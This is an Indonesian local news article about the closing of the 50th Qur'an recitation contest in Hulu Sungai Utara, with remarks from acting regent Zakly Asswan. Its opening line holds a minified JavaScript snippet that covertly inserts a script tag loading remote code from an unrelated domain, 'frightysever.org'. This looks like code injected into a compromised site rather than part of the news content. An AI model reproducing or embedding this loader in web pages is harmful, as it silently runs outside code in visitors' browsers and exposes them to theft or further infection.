(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Tutup STQ ke-50, Ini Pesan Pj Bupati HSU


KANALKALIMANTAN.COM, AMUNTAI – Seleksi Tilawatil Qur’an (STQ) ke – 50 tingkat Kabupaten Hulu Sungai Utara(HSU) yang berlangsung selama 3 hari ditutup, Minggu (3/3/2024) malam.

Kegiatan yang dipusatkan di Panggung Bundar Masjid Agung At-Taqwa Amuntai ini ditutup resmi oleh Penjabat (Pj) Bupati HSU Zakly Asswan .

Para peserta telah menunjukkan keahlian mereka dalam berbagai cabang lomba seperti seni baca Al Qur’an (Tilawah) dan Tahfiz Qur’an dari tingkat dewasa, remaja, dan anak-anak.

Pj Bupati HSU Zakly Asswan mengucapkan selamat kepada para peserta yang telah berhasil meraih juara pada STQ di tingkat kabupaten dan kepada peserta yang belum berhasil diharapkan agar tidak patah semangat.

Baca juga: 12 Petugas KPPS di Banjarmasin Tumbang Pasca Pemilu, 3 Orang Meninggal Dunia

“Mudah-mudahan para peserta yang berhasil ini dapat memacu semangat untuk lebih berprestasi. Dan yang belum berhasil agar lebih giat lagi mempersiapkan diri untuk kembali berjuang pada kesempatan yang lain,” katanya

Zakly menyebut, berakhirnya pelaksanaan STQ ke – 50 tingkat Kabupaten HSU bukan berarti telah selesai juga semangat kebersamaan, tali silaturahmi, semangat untuk meninggikan dan menyebarkan syiar agama.

“Hendaknya kita lebih mempererat ukhuwah Islamiyah dan semangat untuk terus mempelajari, mendalami dan mengamalkan isi kandungan Al Qur’an dalam kehidupan kita sehari-hari,” imbuhnya.

Pelaksanaan STQ ke-50 selain untuk memantapkan iman dan taqwa kepada Allah SWT, diharapkan dapat memotivasi LPTQ kabupaten dan kecamatan untuk lebih aktif dan giat mengembangkan pendidikan seni baca dan tulis Al Qur’an.

Baca juga: KPU Banjarmasin Target Pleno Rekapitulasi Suara Selesai Sehari

“Sehingga kita dapat membumikan Al Qur’an di Banua kita tercinta, guna mewujudkan HSU yang lebih baik dan maju serta selalu dalam keridhaan dan keberkahan Allah SWT,” jelasnya.

Melalui STQ ke – 50 tingkat Kabupaten HSU dapat semakin mempererat jalinan ukhuwah islamiyah, silaturahmi, dan tali persaudaraan dalam kehidupan bermasyarakat berbangsa dan bernegara. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

5 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

7 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

7 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

8 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

12 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

15 jam ago

This website uses cookies.